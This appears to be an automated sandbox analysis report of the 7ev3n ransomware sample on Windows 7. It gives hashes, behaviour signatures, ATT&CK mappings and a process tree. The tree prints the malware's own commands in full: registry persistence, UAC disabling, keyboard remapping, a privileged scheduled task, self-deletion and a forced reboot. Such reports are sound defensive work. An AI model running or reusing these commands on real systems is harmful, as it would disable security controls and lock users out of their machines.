Analysis
max time kernel: 117s
max time network: 129s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 17-03-2024 01:08
Behavioral tasks
Task        | Sample        | Resource
behavioral1 | 7ev3n.exe     | win7-20240221-en
behavioral2 | 7ev3n.exe     | win10v2004-20240226-en
behavioral3 | Annabelle.exe | win7-20240221-en
behavioral4 | Annabelle.exe | win10v2004-20240226-en
behavioral5 | BadRabbit.exe | win7-20240221-en
behavioral6 | BadRabbit.exe | win10v2004-20240226-en
behavioral7 | Birele.exe    | win10v2004-20240226-en
Errors
General
Target: 7ev3n.exe
Size: 315KB
MD5: 9f8bc96c96d43ecb69f883388d228754
SHA1: 61ed25a706afa2f6684bb4d64f69c5fb29d20953
SHA256: 7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
SHA512: 550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
SSDEEP: 6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv
Malware Config
Signatures

- Modifies WinLogon for persistence (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe

- UAC bypass
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe

- Deletes itself (1 IoCs)
  pid | Process
  2712 | cmd.exe

- Executes dropped EXE (1 IoCs)
  pid | Process
  2136 | system.exe

- Loads dropped DLL (2 IoCs)
  pid | Process
  2276 | 7ev3n.exe
  2276 | 7ev3n.exe

- Adds Run key to start application (2 TTPs, 1 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe

- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2692 | SCHTASKS.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeShutdownPrivilege | 1756 | shutdown.exe
  Token: SeRemoteShutdownPrivilege | 1756 | shutdown.exe

- Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  (each of the 16 rows below was reported 4 times, giving 64 IoCs)
  PID 2276 wrote to memory of 2136 | 2276 | 7ev3n.exe | 28
  PID 2136 wrote to memory of 2712 | 2136 | system.exe | 29
  PID 2136 wrote to memory of 2692 | 2136 | system.exe | 31
  PID 2136 wrote to memory of 2732 | 2136 | system.exe | 33
  PID 2136 wrote to memory of 2460 | 2136 | system.exe | 34
  PID 2136 wrote to memory of 2772 | 2136 | system.exe | 36
  PID 2136 wrote to memory of 2720 | 2136 | system.exe | 39
  PID 2136 wrote to memory of 2428 | 2136 | system.exe | 40
  PID 2136 wrote to memory of 2468 | 2136 | system.exe | 42
  PID 2732 wrote to memory of 1880 | 2732 | cmd.exe | 45
  PID 2720 wrote to memory of 2176 | 2720 | cmd.exe | 47
  PID 2772 wrote to memory of 1332 | 2772 | cmd.exe | 46
  PID 2468 wrote to memory of 268 | 2468 | cmd.exe | 48
  PID 2460 wrote to memory of 592 | 2460 | cmd.exe | 49
  PID 2428 wrote to memory of 532 | 2428 | cmd.exe | 50
  PID 2136 wrote to memory of 1932 | 2136 | system.exe | 55
Processes (indentation shows depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\7ev3n.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\7ev3n.exe"
  PID: 2276
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\system.exe
    Command line: "C:\Users\Admin\AppData\Local\system.exe"
    PID: 2136
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c C:\Users\Admin\AppData\Local\del.bat
      PID: 2712
      - Deletes itself
    C:\Windows\SysWOW64\SCHTASKS.exe
      Command line: C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
      PID: 2692
      - Creates scheduled task(s)
    C:\windows\SysWOW64\cmd.exe
      Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      PID: 2732
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        PID: 1880
        - Modifies WinLogon for persistence
    C:\windows\SysWOW64\cmd.exe
      Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      PID: 2460
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        PID: 592
        - Adds Run key to start application
    C:\windows\SysWOW64\cmd.exe
      Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
      PID: 2772
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
        PID: 1332
    C:\windows\SysWOW64\cmd.exe
      Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
      PID: 2720
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
        PID: 2176
    C:\windows\SysWOW64\cmd.exe
      Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
      PID: 2428
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
        PID: 532
    C:\windows\SysWOW64\cmd.exe
      Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
      PID: 2468
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
        PID: 268
        - UAC bypass
    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
      PID: 1932
      C:\Windows\SysWOW64\reg.exe
        Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
        PID: 908
    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
      PID: 2104
      C:\Windows\SysWOW64\shutdown.exe
        Command line: shutdown -r -t 10 -f
        PID: 1756
        - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\LogonUI.exe
  Command line: "LogonUI.exe" /flags:0x0
  PID: 1976

C:\Windows\system32\LogonUI.exe
  Command line: "LogonUI.exe" /flags:0x1
  PID: 2276
Network
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Downloads
- Filesize: 65B
  MD5: f727ee128a7eeb23b9c3242b049e61ef
  SHA1: a260ee1e7c05377830130163737c7609598d61ee
  SHA256: 98bfdb556f8e8a2564cadfd0c62fff7b81b3a70a4f7e03a86f704fabd5d3c884
  SHA512: c59a537dbd2349d0f29b6596d35c387fbb76a2cde16fddee04c3d861221c2a7a9ef1af67577a63a80523ec4fc079cc64090e3e86544730bf9cdac2ca122a9c0e
- Filesize: 315KB
  MD5: 94179bb0b7cc41c3e322867ef0d49bef
  SHA1: 59063e891689cdf4b72e97c58d39dbd885085bee
  SHA256: aa5f8f584d1f4e967f8580a8e507be38248cdad2ed81ae59bddcc9c561c3f1c3
  SHA512: 4bef8fd6f79413378d212cc5f1293becd68b6700d766b65a90d3368cf158c54b45a87dd6e19ed8bb69ed3c73e4c74e81a5f09df77731e8d9b79be8417f9e0a04